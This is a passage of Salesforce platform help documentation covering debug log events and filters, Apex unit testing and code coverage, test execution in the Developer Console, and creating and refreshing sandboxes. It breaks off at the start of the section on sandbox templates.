INFO and aboveApex ProfilingNoneCUMULATIVE_LIMIT_USAGE_END

FINE and aboveApex ProfilingNoneCUMULATIVE_PROFILING

FINE and aboveApex ProfilingNoneCUMULATIVE_PROFILING_BEGIN

FINE and aboveApex ProfilingNoneCUMULATIVE_PROFILING_END
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Level LoggedCategory LoggedFields or Information Logged With EventEvent Name

INFO and aboveApex CodeLine number, operation (such as Insert,
Update, and so on), record name or type,
number of rows passed into DML operation

DML_BEGIN

INFO and aboveApex CodeLine numberDML_END

INFO and aboveApex CodeLine numberEMAIL_QUEUE

INFO and aboveApex CodePackage namespaceENTERING_MANAGED_PKG

INFO and aboveApex CodeLine number, exception type, messageEXCEPTION_THROWN

ERROR and aboveApex CodeNoneEXECUTION_FINISHED

ERROR and aboveApex CodeNoneEXECUTION_STARTED

ERROR and aboveApex CodeException type, message, stack traceFATAL_ERROR

FINER and aboveApex CodeLine number, number of bytesHEAP_ALLOCATE

FINER and aboveApex CodeLine number, number of bytes deallocatedHEAP_DEALLOCATE

FINESTDBLine numberIDEAS_QUERY_EXECUTE

FINESTApex ProfilingNamespace, following limits:
Number of SOQL queries

LIMIT_USAGE_FOR_NS

Number of query rows

Number of SOSL queries

Number of DML statements

Number of DML rows

Number of code statements

Maximum heap size

Number of callouts

Number of Email Invocations

Number of fields describes

Number of record type describes

Number of child relationships

describes

Number of picklist describes

Number of future calls

Number of find similar calls

Number of System.runAs()

invocations

3745

Setting Debug Log FiltersDebug



Level LoggedCategory LoggedFields or Information Logged With EventEvent Name

DEBUG and aboveApex CodeLine number, the Force.com ID of the class,
method signature

METHOD_ENTRY

DEBUG and aboveApex CodeLine number, the Force.com ID of the class,
method signature.

For constructors, the following information
is logged: Line number, class name.

METHOD_EXIT

INFO and aboveSystemLine number, the Force.com ID of the class
or trigger that has its log filters set and that

POP_TRACE_FLAGS

is going into scope, the name of this class or
trigger, the log filter settings that are now in
effect after leaving this scope

INFO and aboveSystemLine number, the Force.com ID of the class
or trigger that has its log filters set and that

PUSH_TRACE_FLAGS

is going out of scope, the name of this class
or trigger, the log filter settings that are now
in effect after entering this scope

INFO and aboveDBLine number, number of queryMore
iterations

QUERY_MORE_ITERATIONS

INFO and aboveDBLine number, Savepoint nameSAVEPOINT_ROLLBACK

INFO and aboveDBLine number, Savepoint nameSAVEPOINT_SET

INFO and aboveWorkflowNumber of cases, load time, processing time,
number of case milestones to
insert/update/delete, new trigger

SLA_END

INFO and aboveWorkflowMilestone IDSLA_EVAL_MILESTONE

INFO and aboveWorkflowNoneSLA_NULL_START_DATE

INFO and aboveWorkflowCase IDSLA_PROCESS_CASE

INFO and aboveDBLine number, number of aggregations, query
source

SOQL_EXECUTE_BEGIN

INFO and aboveDBLine number, number of rows, duration in
milliseconds

SOQL_EXECUTE_END

INFO and aboveDBLine number, query sourceSOSL_EXECUTE_BEGIN

INFO and aboveDBLine number, number of rows, duration in
milliseconds

SOSL_EXECUTE_END

FINE and aboveApex ProfilingFrame number, variable list of the form:
Variable number | Value. For example:

var1:50

var2:'Hello World'

STACK_FRAME_VARIABLE_LIST

FINER and aboveApex CodeLine numberSTATEMENT_EXECUTE
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Level LoggedCategory LoggedFields or Information Logged With EventEvent Name

FINE and aboveApex ProfilingVariable list of the form: Variable number
| Value. For example:

var1:50

var2:'Hello World'

STATIC_VARIABLE_LIST

DEBUGSystemLine number, the string <init>() with the
types of parameters, if any, between the
parentheses

SYSTEM_CONSTRUCTOR_ENTRY

DEBUGSystemLine number, the string <init>() with the
types of parameters, if any, between the
parentheses

SYSTEM_CONSTRUCTOR_EXIT

DEBUGSystemLine number, method signatureSYSTEM_METHOD_ENTRY

DEBUGSystemLine number, method signatureSYSTEM_METHOD_EXIT

INFO and aboveSystemMode nameSYSTEM_MODE_ENTER

INFO and aboveSystemMode nameSYSTEM_MODE_EXIT

INFO and aboveApex ProfilingNoneTESTING_LIMITS

FINE and aboveApex ProfilingNumber of emails sentTOTAL_EMAIL_RECIPIENTS_QUEUED

DEBUG and above
by default. If the

Apex CodeLine number, logging level, user-supplied
string

USER_DEBUG

user sets the log
level for the
System.Debug
method, the event is
logged at that level
instead.

INFO and aboveValidationError messageVALIDATION_ERROR

INFO and aboveValidationNoneVALIDATION_FAIL

INFO and aboveValidationFormula source, valuesVALIDATION_FORMULA

INFO and aboveValidationNoneVALIDATION_PASS

INFO and aboveValidationRule nameVALIDATION_RULE

FINESTApex CodeLine number, variable name, a string
representation of the variable's value, the
variable's address

VARIABLE_ASSIGNMENT

FINESTApex CodeLine number, variable name, type, a value
that indicates if the variable can be referenced,
a value that indicates if the variable is static

VARIABLE_SCOPE_BEGIN

FINESTApex CodeNoneVARIABLE_SCOPE_END

INFO and aboveApex CodeElement name, method name, return typeVF_APEX_CALL

INFO and aboveVisualforceView state IDVF_DESERIALIZE_VIEWSTATE_BEGIN
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Level LoggedCategory LoggedFields or Information Logged With EventEvent Name

INFO and aboveVisualforceNoneVF_DESERIALIZE_VIEWSTATE_END

FINER and aboveVisualforceView state ID, formulaVF_EVALUATE_FORMULA_BEGIN

FINER and aboveVisualforceNoneVF_EVALUATE_FORMULA_END

INFO and aboveApex CodeMessage textVF_PAGE_MESSAGE

INFO and aboveVisualforceView state IDVF_SERIALIZE_VIEWSTATE_BEGIN

INFO and aboveVisualforceNoneVF_SERIALIZE_VIEWSTATE_END

INFO and aboveWorkflowAction descriptionWF_ACTION

INFO and aboveWorkflowTask subject, action ID, rule, owner, due dateWF_ACTION_TASK

INFO and aboveWorkflowSummary of actions performedWF_ACTIONS_END

INFO and aboveWorkflowTransition type, EntityName: NameField
Id, process node name

WF_APPROVAL

INFO and aboveWorkflowEntityName: NameField IdWF_APPROVAL_REMOVE

INFO and aboveWorkflowEntityName: NameField IdWF_APPROVAL_SUBMIT

INFO and aboveWorkflowOwner, assignee template IDWF_ASSIGN

INFO and aboveWorkflowEntityName: NameField Id, rule name,
rule ID, trigger type (if rule respects trigger
types)

WF_CRITERIA_BEGIN

INFO and aboveWorkflowBoolean value indicating success (true or false)WF_CRITERIA_END

INFO and aboveWorkflowAction ID, ruleWF_EMAIL_ALERT

INFO and aboveWorkflowEmail template ID, recipients, CC emailsWF_EMAIL_SENT

INFO and aboveWorkflowSummary of actions enqueuedWF_ENQUEUE_ACTIONS

INFO and aboveWorkflowCase ID, business hoursWF_ESCALATION_ACTION

INFO and aboveWorkflowNoneWF_ESCALATION_RULE

INFO and aboveWorkflowProcess name, email template ID, Boolean
value indicating result (true or false)

WF_EVAL_ENTRY_CRITERIA

INFO and aboveWorkflowEntityName: NameField Id, object or
field name

WF_FIELD_UPDATE

INFO and aboveWorkflowFormula source, valuesWF_FORMULA

INFO and aboveWorkflowNoneWF_HARD_REJECT

INFO and aboveWorkflowOwner, next owner type, fieldWF_NEXT_APPROVER

INFO and aboveWorkflowNoneWF_NO_PROCESS_FOUND

INFO and aboveWorkflowEntityName: NameField Id, action ID,
rule

WF_OUTBOUND_MSG

INFO and aboveWorkflowProcess nameWF_PROCESS_NODE

INFO and aboveWorkflowEntityName: NameField Id, ownerWF_REASSIGN_RECORD
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Level LoggedCategory LoggedFields or Information Logged With EventEvent Name

INFO and aboveWorkflowNotifier name, notifier email, notifier
template ID

WF_RESPONSE_NOTIFY

INFO and aboveWorkflowInteger, indicating orderWF_RULE_ENTRY_ORDER

INFO and aboveWorkflowRule typeWF_RULE_EVAL_BEGIN

INFO and aboveWorkflowNoneWF_RULE_EVAL_END

INFO and aboveWorkflowValueWF_RULE_EVAL_VALUE

INFO and aboveWorkflowFilter criteriaWF_RULE_FILTER

INFO and aboveWorkflowEntityName: NameField IdWF_RULE_INVOCATION

INFO and aboveWorkflowNoneWF_RULE_NOT_EVALUATED

INFO and aboveWorkflowProcess nameWF_SOFT_REJECT

INFO and aboveWorkflowNode typeWF_SPOOL_ACTION_BEGIN

INFO and aboveWorkflowEntityName: NameField Id, time action,
time action container, evaluation Datetime

WF_TIME_TRIGGER

INFO and aboveWorkflowNoneWF_TIME_TRIGGERS_BEGIN

See Also:
Debug Log Filtering for Apex Classes and Apex Triggers

Searching a Debug Log
To search for text in a debug log, use the Command Line Window in the Developer Console.

Before you can search, you must execute Apex statements to generate the log from the Command Line Window.

1. To open the Command Line Window, click CTRL+L.
2. Execute Apex code to generate a log:

• To enter Apex statements at the command-line, type exec <Apex statements>.

For example:

exec List<Account> accts = new List<Account>();
for (Integer i=0; i<20; i++){
Account a = new Account(name='Account Name ' + i);
accts.add(a);
}

• To execute code you already entered in the Enter Apex Code window, type exec-r.

3. After the log has been generated, type find <string> to search for the specified text.

For example: find Account Name.
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Search results are displayed in the Command Line Window.
4. To close the Command Line Window, click CTRL+L.

See Also:
Developer Console Command Line Reference

Debug Log Filtering for Apex Classes and Apex Triggers
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

Setting Debug Log Filters for Apex Classes and Triggers

Debug log filtering provides a mechanism for fine-tuning the log verbosity at the trigger and class level. This is especially
helpful when debugging Apex logic. For example, to evaluate the output of a complex process, you can raise the log verbosity
for a given class while turning off logging for other classes or triggers within a single request.

When you override the debug log levels for a class or trigger, these debug levels also apply to the class methods that your class
or trigger calls and the triggers that get executed as a result. All class methods and triggers in the execution path inherit the
debug log settings from their caller, unless they have these settings overridden.

The following diagram illustrates overriding debug log levels at the class and trigger level. For this scenario, suppose Class1
is causing some issues that you would like to take a closer look at. To this end, the debug log levels of Class1 are raised to
the finest granularity. Class3 doesn't override these log levels, and therefore inherits the granular log filters of Class1.
However, UtilityClass has already been tested and is known to work properly, so it has its log filters turned off. Similarly,
Class2 isn't in the code path that causes a problem, therefore it has its logging minimized to log only errors for the Apex
Code category. Trigger2 inherits these log settings from Class2.

Figure 23: Fine-tuning debug logging for classes and triggers

The following is a pseudo-code example that the diagram is based on.

1. Trigger1 calls a method of Class1 and another method of Class2. For example:

trigger Trigger1 on Account (before insert) {
Class1.someMethod();
Class2.anotherMethod();

}
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2. Class1 calls a method of Class3, which in turn calls a method of a utility class. For example:

public class Class1 {
public static void someMethod() {

Class3.thirdMethod();
}

}

public class Class3 {
public static void thirdMethod() {

UtilityClass.doSomething();
}

}

3. Class2 causes a trigger, Trigger2, to be executed. For example:

public class Class2 {
public static void anotherMethod() {

// Some code that causes Trigger2 to be fired.
}

}

To set log filters:

1. From a class or trigger detail page, click Log Filters.
2. Click Override Log Filters.

The log filters are set to the default log levels.

3. Choose the log level desired for each log category.

To learn more about debug log categories, debug log levels, and debug log events, see Setting Debug Log Filters.

See Also:
Setting Debug Log Filters

TEST

Testing Your Changes
This section contains information about testing your changes.

• About Apex Unit Tests

• Working with Apex Test Execution

• Running Tests in the Developer Console

• Executing Anonymous Apex Code

• Sandbox Overview
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About Apex Unit Tests
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

Managed Packages are not available in Database.com.

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

Testing is key to the success of your application, particularly if your application is to be deployed to customers. If you validate
that your application works as expected and that there are no unexpected behaviors, your customers are going to trust you
more.

To facilitate the development of robust, error-free code, Apex supports the creation and execution of unit tests. Unit tests are
class methods that verify whether a particular piece of code is working properly. Unit test methods take no arguments, commit
no data to the database, send no emails, and are flagged with the testMethod keyword in the method definition.

You can run unit tests for:

• A specific class

• A subset of classes

• All unit tests in your organization

Code Coverage by Unit Tests
Before you can deploy your code or package it for the Force.com AppExchange, the following must be true:

• At least 75% of your Apex code must be covered by unit tests, and all of those tests must complete successfully.

Note the following.

◊ When deploying to a production organization, every unit test in your organization namespace is executed.
◊ Calls to System.debug are not counted as part of Apex code coverage.
◊ Test methods and test classes are not counted as part of Apex code coverage.
◊ While only 75% of your Apex code must be covered by tests, your focus shouldn't be on the percentage of code that is

covered. Instead, you should make sure that every use case of your application is covered, including positive and negative
cases, as well as bulk and single record. This should lead to 75% or more of your code being covered by unit tests.

• Every trigger must have some test coverage.
• All classes and triggers must compile successfully.

If your test calls another class or causes a trigger to execute, that Apex is included in the total amount used for calculating the
percentage of code covered.

After tests are executed, the code coverage percentage displays for classes and triggers on the Apex Classes and Apex Triggers
pages respectively.

To generate code coverage results, run your tests first. The following are different ways to run tests and generate code coverage
results.
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• To run all tests from the Apex Classes page, from Setup, click Develop > Apex Classes > Run All Tests.

This step updates the code coverage results in the class list on the Apex Classes page.

• To run tests for an individual class:

1. From Setup, click Develop > Apex Classes > Your Class > Run Test.
2. Click Apex Classes, then Estimate your organization’s code coverage.

• To run tests from the Apex Test Execution page:

1. From Setup, click Develop > Apex Test Execution.
2. Click Select Tests... and select the classes containing the tests you want to run.
3. Click Run.
4. Click Apex Classes, then Estimate your organization’s code coverage.

• To run tests from the Developer Console, see Creating Test Runs.

Apex test classes are placed in the Apex job queue for execution. The maximum number of test classes you can run per a
24-hour period is the greater of 500 or 10 multiplied by the number of test classes in the organization.

After generating code coverage results, you can view the lines of code that are covered by tests for an individual class or trigger.
Follow these steps to view code coverage for a class:

1. From Setup, click Develop > Apex Classes.
2. Click the percentage number in the Code Coverage column for the class you’re interested in.

The blue lines represent the code statements that have been covered by a test. The red lines represent the code statements
with no test coverage.

Alternatively, you can check code coverage from the Developer Console. See Checking Code Coverage.

The code coverage percentage for a class or trigger displayed on the Apex Classes or the Apex Triggers page includes a fraction
between parentheses with the numbers used to compute this percentage, for example, 90% (72/80). The code coverage
percentage is calculated by dividing the number of lines covered by tests by the total number of lines that are part of the coverage
calculation. Some lines of code are excluded from code coverage calculation, such as:

• Comments
• System.debug statements
• Test methods
• A code statement that is broken up into multiple lines—only the first line is counted

See Also:
Working with Apex Test Execution
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APEX TEST EXECUTION

Working with Apex Test Execution
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

To use the Apex Test Execution page:

1. From Setup, click Develop > Apex Test Execution.
2. Click Select Tests....

Note:  If you have Apex classes that are installed from a managed package, you must compile these classes first
by clicking Compile all classes on the Apex Classes page so that they appear in the list. See Managing Apex
Classes on page 3580.

3. Select the tests to run. The list of tests contains classes that contain test methods.

• To select tests from an installed managed package, select its corresponding namespace from the drop-down list. Only
the classes of the managed package with the selected namespace appear in the list.

• To select tests that exist locally in your organization, select [My Namespace] from the drop-down list. Only local
classes that aren't from managed packages appear in the list.

• To select any test, select [All Namespaces] from the drop-down list. All the classes in the organization appear, whether
or not they are from a managed package.

Note:  Classes whose tests are still running don't appear in the list.

4. Click Run.

After selecting test classes to run, the selected classes are placed in the Apex job queue for execution. The maximum number
of test classes you can select for execution is the greater of 500 or 10 multiplied by the number of test classes in the organization
per a 24-hour period.

To disable parallel execution of tests in order to run your tests one at a time, click Options..., select Disable Parallel Apex
Testing, and then click OK. Running tests one at a time helps prevent test interference on shared data when tests run at the
same time and access the same data. This only occurs when tests don’t create their own data and turn off data isolation to
access the organization’s data. For more information about test data, see “Isolation of Test Data from Organization Data in
Unit Tests” in the Force.com Apex Code Developer’s Guide. This option doesn’t affect the asynchronous execution of tests, which
continue to run asynchronously from the Apex Test Execution page.
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While tests are running, you can select one or more tests and click Abort to cancel.

After a test finishes running, you can:

• Click the test to see result details; if a test fails, the first error message and the stack trace display.

• Click View to see the source Apex code.

Note:  Test results display for 60 minutes after they finish running.

Use the Apex Test Results page to see all test results for your organization. From Setup, click Develop > Apex Test Execution
> View Test History.

Use the Developer Console to see additional information about your test execution:

1. Click Your Name > Developer Console.
2. Run your tests using the Apex Test Execution page.
3. Check the Developer Console to step through the request.

Inspecting Code Coverage Results

After you run tests using the Apex Test Execution page, you can display the percentage of code covered by those tests on the
list of Apex classes. From Setup, click Develop > Apex Classes, then click Estimate your organization's code coverage.

Note:  The code coverage value computed by Estimate your organization's code coverage might differ from the
code coverage value computed after running all unit tests using Run All Tests. This is because Estimate your
organization's code coverage excludes classes that are part of installed managed packages while Run All Tests doesn't.

You can also verify which lines of code are covered by tests for an individual class. From Setup, click Develop > Apex Classes,
then click the percentage number in the Code Coverage column for a class.

To reduce calculation time of overall code coverage results obtained through Estimate your organization's code coverage,
click Options..., select Store Only Aggregated Code Coverage, and then click OK . Use this option only when you have
many tests and large volumes of Apex code, that is, when the number of Apex test methods multiplied by the number of all
classes and triggers is in the range of hundreds of thousands. This option causes code coverage results to be stored in aggregate
form for all test methods. As a result, you can’t view code coverage results for an individual test method. Also, if you modify
test methods that are defined in a test class (a class annotated with @isTest), you’ll have to clear code coverage results by
clicking Clear Code Coverage on the Apex Classes page. This is because the existing code coverage results of classes and
triggers that these test methods cover aren’t automatically cleared when using this option and modifying the tests. For more
information on running tests, see “Running Unit Test Methods” in the Force.com Apex Code Developer’s Guide.

See Also:
Apex Test Results
Apex Test Results Details
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Apex Test Results
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

From Setup, click Develop > Apex Test Execution > View Test History to view all test results for your organization, not just
tests that you have run. Test results are retained for 30 days after they finish running, unless cleared.

To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views.To edit or delete any view you created, select it from the View drop-down list and click Edit.

Click View to view more details about a specific test run.

The debug log is automatically set to specific log levels and categories, which can't be changed in the Apex Test Execution
page.

LevelCategory

INFODatabase

FINEApex Code

FINEApex Profiling

FINESTWorkflow

INFOValidation

Important:  Before you can deploy Apex or package it for the Force.com AppExchange, the following must be true.

• At least 75% of your Apex code must be covered by unit tests, and all of those tests must complete successfully.

Note the following.

◊ When deploying to a production organization, every unit test in your organization namespace is executed.

◊ Calls to System.debug are not counted as part of Apex code coverage.

◊ Test methods and test classes are not counted as part of Apex code coverage.

◊ While only 75% of your Apex code must be covered by tests, your focus shouldn't be on the percentage of
code that is covered. Instead, you should make sure that every use case of your application is covered, including
positive and negative cases, as well as bulk and single record. This should lead to 75% or more of your code
being covered by unit tests.

• Every trigger must have some test coverage.
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• All classes and triggers must compile successfully.

See Also:
Apex Test Results Details

Apex Test Results Details
Available in: Unlimited, Developer, Enterprise, and Database.com Editions

User Permissions Needed

“Author Apex”To define, edit, delete, set security, set version settings, show dependencies, and run tests
for Apex classes:

To view all test results for your organization in the default view for 30 days unless cleared, not just tests that you have run,
from Setup, click Develop > Apex Test Execution > View Test History. Click View to view more details about a specific test
run.

See Also:
Apex Test Results

RUNNING TESTS IN THE DEVELOPER CONSOLE

Running Tests in the Developer Console
Testing is the key to successful long term development, and is a critical component of the development process. We strongly
recommend that you use a test-driven development process, that is, test development that occurs at the same time as code
development. Use the Developer Console to create test runs, run tests, and check Apex code coverage.

The Developer Console Test menu allows you to manage your test runs. It includes the following options:

• New Run: Creates a new test run. For details, see Creating Test Runs.

• Re-Run: Runs the test selected in the Tests tab.

• Run All: Runs all saved test runs.

• Abort: Aborts the test selected in the Tests tab.

• Collapse All: Collapses all open tests in the Tests tab.

• Expand All: Expands all tests in the Tests tab.
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Completed tests are listed on the Tests tab in the bottom panel of the Developer Console.

The Overall Code Coverage pane displays the percentage of code coverage for each class in your organization. The pane
always displays the current percentage for every class. After you perform a test run of all classes, it displays the overall
organization-wide percentage in bold. For more information, see Checking Code Coverage.

For more information on testing, see the following sections in the Force.com Apex Code Developer's Guide:

• Understanding Testing in Apex

• Unit Testing Apex

See Also:
Creating Test Runs
Checking Code Coverage

Checking Code Coverage
The Developer Console retrieves and displays code coverage information from your organization. Code coverage results come
from any tests you’ve run from an API or from a user interface (for example, the Developer Console, the Force.com IDE, or
the Apex Test Execution page). When you edit a class, the code coverage for that class clears until you run the tests again.

You can view code coverage in several places in the Developer Console.

• The Tests tab includes an Overall Code Coverage panel that displays the code coverage percentage for every Apex class
in your organization that has been included in a test run. It also displays the overall percentage.

• Double-click a completed test run to open a Tests Results view that displays the tested class, the tested method, the
duration, result (skip, pass, or fail), and an optional error message. If the test failed, a Stack Trace column shows the method
and line number at which the test failed.

• To view line-by-line code coverage for an Apex class, open the class. The Code Coverage menu will include one or more
of the following options depending on the tests you have implemented:

◊ None
◊ All Tests: The percentage of code coverage from all test runs.
◊ className.methodName: The percentage of code coverage from a method executed during a test run.

Lines of code that are covered by tests are blue. Lines of code that aren’t covered are red. Lines of code that don’t require
coverage (for example, curly brackets, comments, and System.debug calls) are left white.
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Note:  When you edit a class with code coverage, the blue and red highlighting in the Source Code Editor dims to
indicate that the coverage is no longer valid. When you edit and save a class, the coverage is removed for that class.
To check coverage for that class, run the tests again.

See Also:
Creating Test Runs
Running Tests in the Developer Console

Creating Test Runs
A test run is a collection of classes that contain test methods. Use a test run to execute the test methods in a group of classes.

1. In the Developer Console, click Test > New Run.
Classes with test methods are listed in the Select Tests window.
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2. Select classes in the Test Classes pane and click  to move the classes to the Selected Test Classes pane.

To filter the list of classes, type in the Filter box. To select multiple adjacent classes, select a class and press the SHIFT
key while you click the classes you want to select. To select nonadjacent classes, select a single class and press the CTRL
key while you click the other classes you want to select. You can also click Select All.

3. When all the classes you want to run are included in the Selected Test Classes pane, click Run to queue and run the classes.

The test run will appear in the Tests tab. To stop a test, click Test > Abort.

Note:  If your test methods call other methods or classes defined as tests in your organization, those methods and
classes are also run.

4. From the Tests tab, expand the test run to see the results for each method invoked by each class in the run.

Note:  Test classes don’t require code coverage, so they show 0% coverage in the Overall Code Coverage pane
and don’t affect the overall code coverage percentage.

5. Double-click the completed test run to open the results in detail view that displays the tested class, the tested method, the
duration, result (skip, pass, or fail), and an optional error message.

If a test failed, the Stack Trace column shows the method and line number at which the test failed.

6. Select a test method to see its coverage for each class in the Class Code Coverage pane.

See Also:
Running Tests in the Developer Console
Checking Code Coverage

SANDBOXES

Sandbox Overview
Available in: Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view a sandbox:

“Modify All Data”To create, refresh, activate, and delete sandbox:

Salesforce gives you the ability to create multiple copies of your organization in separate environments for a variety of purposes,
such as testing and training, without compromising the data and applications in your Salesforce production organization.
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These copies are called sandboxes and are nearly identical to your Salesforce production organization. For a list of differences,
see Sandbox Setup Tips and Considerations on page 3767.

Sandboxes are completely isolated from your Salesforce production organization, so operations you perform in your sandboxes
do not affect your Salesforce production organization, and vice versa.

The sandbox types are:

Developer Sandbox

Developer sandboxes are special configuration sandboxes intended for coding and testing by a single developer. Multiple
users can log into a single Developer sandbox, but their primary purpose is to provide an environment in which changes
under active development can be isolated until they’re ready to be shared. Just like Configuration Only sandboxes,
Developer sandboxes copy all application and configuration information to the sandbox. Developer sandboxes are limited
to 10 MB of test or sample data, which is enough for many development and testing tasks. You can refresh a Developer
sandbox once per day.

Configuration Only Sandbox

Configuration Only sandboxes copy all of your production organization's reports, dashboards, price books, products,
apps, and customizations under Setup, but exclude all of your organization's standard and custom object records,
documents, and attachments. Creating a Configuration Only sandbox can decrease the time it takes to create or refresh
a sandbox from several hours to just a few minutes, but it can only include up to 500 MB of data. You can refresh a
Configuration Only sandbox once per day.

Full Sandbox

Full sandboxes copy your entire production organization and all its data, including standard and custom object records,
documents, and attachments. You can refresh a Full sandbox every 29 days.

Sandbox templates allow you to pick specific objects and data to copy to your sandbox, so you can control the size and content
of each sandbox. Sandbox templates are only available for Full sandboxes.

Sandbox Availability

You purchase licenses for each sandbox type, and can purchase multiple licenses of each type. Sandbox licenses are hierarchical.
Specifically, the following table shows the type of sandbox you can create with each license:

Developer Sandbox
license

Configuration Only
Sandbox license

Full Sandbox license

Allows you to create:

Developer sandbox type

Configuration Only sandbox type

Full sandbox type

License stages are:

Available
A purchased sandbox license. Salesforce displays the number of “Available” sandboxes. This is your total number of used
and unused sandboxes.
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In use
The active, or ready to be activated, sandboxes you created with your license.

Note:  If you don’t see a sandbox option or need licenses for more sandboxes, contact salesforce.com to order sandboxes
for your organization.

The status of a Sandbox can be:

Copying
A sandbox in the initial creation stage. When you create (or refresh) a sandbox, Salesforce copies the configuration and
data you specify to the sandbox. A sandbox in the “Copying” stage is not yet ready for use. Copy time depends on the
size of the data, and can take several hours.

Ready for use
Salesforce finished copying data to the sandbox, and you can log into the sandbox or run application tests on the sandbox.

Replacement Ready
When you refresh an existing sandbox, you also need to activate it. The “Replacement Ready” status indicates Salesforce
has a copy of your object data and is ready for you to activate the sandbox so you can use it.

See Also:
Creating or Refreshing a Sandbox
Sandbox Restrictions and Licenses
Creating Sandbox Templates
Change Sets Overview
Monitoring Metadata Deployments
Development Lifecycle Guide

Creating or Refreshing a Sandbox
Available in: Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view a sandbox:

“Modify All Data”To create, refresh, activate, and delete sandbox:

You have two ways to copy your data to a sandbox.

1. Create a new sandbox.

When you create a new sandbox, Salesforce automatically copies your data from a production organization to a sandbox
organization. While creating a Full sandbox, you can apply a sandbox template, if you have created one. Customers create
sandbox templates to define specific object data to copy into the Full sandbox.

2. Refresh and activate an existing sandbox.
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If you already created a sandbox, you can refresh the sandbox with new object metadata and data from your production
organization. You only refresh or activate an existing sandbox. The first time you create a sandbox, Salesforce activates the
sandbox for you.

To create a new sandbox:

1. From Setup, click Sandboxes.
2. Click New Sandbox.
3. Enter a name and description for the sandbox. You can only change the name when you create or refresh a sandbox.

Tip:  We recommend that you choose a name that:

• Reflects the purpose of this sandbox, such as “QA.”
• Has few characters because Salesforce automatically appends the sandbox name to usernames and email

addresses on user records in the sandbox environment. Names with fewer characters make sandbox logins
easier to type.

4. Select the type of sandbox you want.

Developer Sandbox

Developer sandboxes are special configuration sandboxes intended for coding and testing by a single developer.
Multiple users can log into a single Developer sandbox, but their primary purpose is to provide an environment in
which changes under active development can be isolated until they’re ready to be shared. Just like Configuration
Only sandboxes, Developer sandboxes copy all application and configuration information to the sandbox. Developer
sandboxes are limited to 10 MB of test or sample data, which is enough for many development and testing tasks.
You can refresh a Developer sandbox once per day.

Configuration Only Sandbox

Configuration Only sandboxes copy all of your production organization's reports, dashboards, price books, products,
apps, and customizations under Setup, but exclude all of your organization's standard and custom object records,
documents, and attachments. Creating a Configuration Only sandbox can decrease the time it takes to create or
refresh a sandbox from several hours to just a few minutes, but it can only include up to 500 MB of data. You can
refresh a Configuration Only sandbox once per day.

Full Sandbox

Full sandboxes copy your entire production organization and all its data, including standard and custom object records,
documents, and attachments. You can refresh a Full sandbox every 29 days.

Note:  If you don’t see a sandbox option or need licenses for more sandboxes, contact salesforce.com to order
sandboxes for your organization.

If you have reduced the number of sandboxes you purchased, but you still have more sandboxes of a specific type than
allowed, you will be required to match your sandboxes to the number of sandboxes that you purchased. For example, if
you have two Full sandboxes but purchased only one, you cannot refresh your Full sandbox as a Full sandbox. Instead, you
must choose one Full sandbox to convert to a smaller sandbox, such as a Configuration Only or a Developer sandbox,
depending on which types you have available.

5. Select the data you want to include in your sandbox (you have this option for a Full sandbox).

For a Full sandbox, choose how much object history, case history, and opportunity history to copy, and whether or not to
copy Chatter data. Object history is the field history tracking of custom and most standard objects; case history and
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opportunity history serve the same purpose for cases and opportunities. You can copy from 0 to 180 days of history, in
30–day increments. The default value is 0 days. Chatter data includes feeds, messages, and discovery topics. Decreasing
the amount of data you copy can significantly speed up sandbox copy time.

You can choose to include Template-based data. For this option, you need to have already created a sandbox template.
Then you can pick the template from a list of templates you’ve created. For more information, see Creating Sandbox
Templates on page 3765.

6. Click Create.

The process may take several minutes, hours, or even days, depending on the size and type of your organization.

Tip:  Try to limit changes in your production organization while the sandbox copy proceeds.

To refresh an existing sandbox:

1. From Setup, click Sandboxes.

You’ll see a list of your sandboxes. Sandboxes that you can refresh have a Refresh link next to the sandbox name.

2. Next to the sandbox name, click Refresh.
3. Select the data you want to copy.

For a Full sandbox, choose how much object history, case history, and opportunity history to copy, and whether or not to
copy Chatter data. Object history is the field history tracking of custom and most standard objects; case history and
opportunity history serve the same purpose for cases and opportunities. You can copy from 0 to 180 days of history, in
30–day increments. The default value is 0 days. Chatter data includes feeds, messages, and discovery topics. Decreasing
the amount of data you copy can significantly speed up sandbox copy time.

4. Click Refresh.

Salesforce starts copying data to the sandbox.

After Salesforce finishes copying data to the sandbox, you still need to activate the sandbox before you can use the refreshed
data. Salesforce sends you an email when your sandbox is ready to activate.

To activate a refreshed sandbox:

1. From Setup, click Sandboxes.

You’ll see a list of your sandboxes. Sandboxes that you can activate have an Activate link next to the sandbox name.

2. Click the Activate link next to the sandbox you wish to activate.

This will take you to a page warning of removal of your existing sandbox.

Warning:  Activating a replacement sandbox that was created using the Refresh link completely deletes the
sandbox it is refreshing. All configuration and data in the prior sandbox copy will be lost, including any application
or data changes you have made. Please read the warning carefully, and press the Activate link only if you have no
further need for the contents of the sandbox copy currently in use. Your production organization and its data will
not be affected.

3. Read the warning carefully and if you agree to the removal, enter the acknowledgment text at the prompt and click the
Activate button.

When your sandbox is ready for use:
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• You will receive a notification email when your newly created or refreshed sandbox has completed copying. If you are
creating a new sandbox, the newly created sandbox is now ready for use.

• You can click the link in the notification email to access your sandbox.

• Users can log into the sandbox at https://test.salesforce.com by appending .sandbox_name to their Salesforce
usernames. For example, if a username for a production organization is user1@acme.com, and the sandbox is named
“test”, then the modified username to log into the sandbox is user1@acme.com.test.

Note: Salesforce automatically changes sandbox usernames, but not passwords.

Newly created sandboxes have the default email deliverability setting System email only. The System email
only setting is especially useful for controlling email sent from sandboxes so that testing and development work
doesn’t send test emails to your users.

See Also:
Sandbox Overview
Creating Sandbox Templates
Managing Sandboxes
Sandbox Setup Tips and Considerations
Sandbox Restrictions and Licenses

Creating Sandbox Templates
Sandbox templates control what data is copied into a sandbox.

Available in: Enterprise, Unlimited, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view a sandbox:

“Modify All Data”To create, refresh, activate, and delete sandbox:

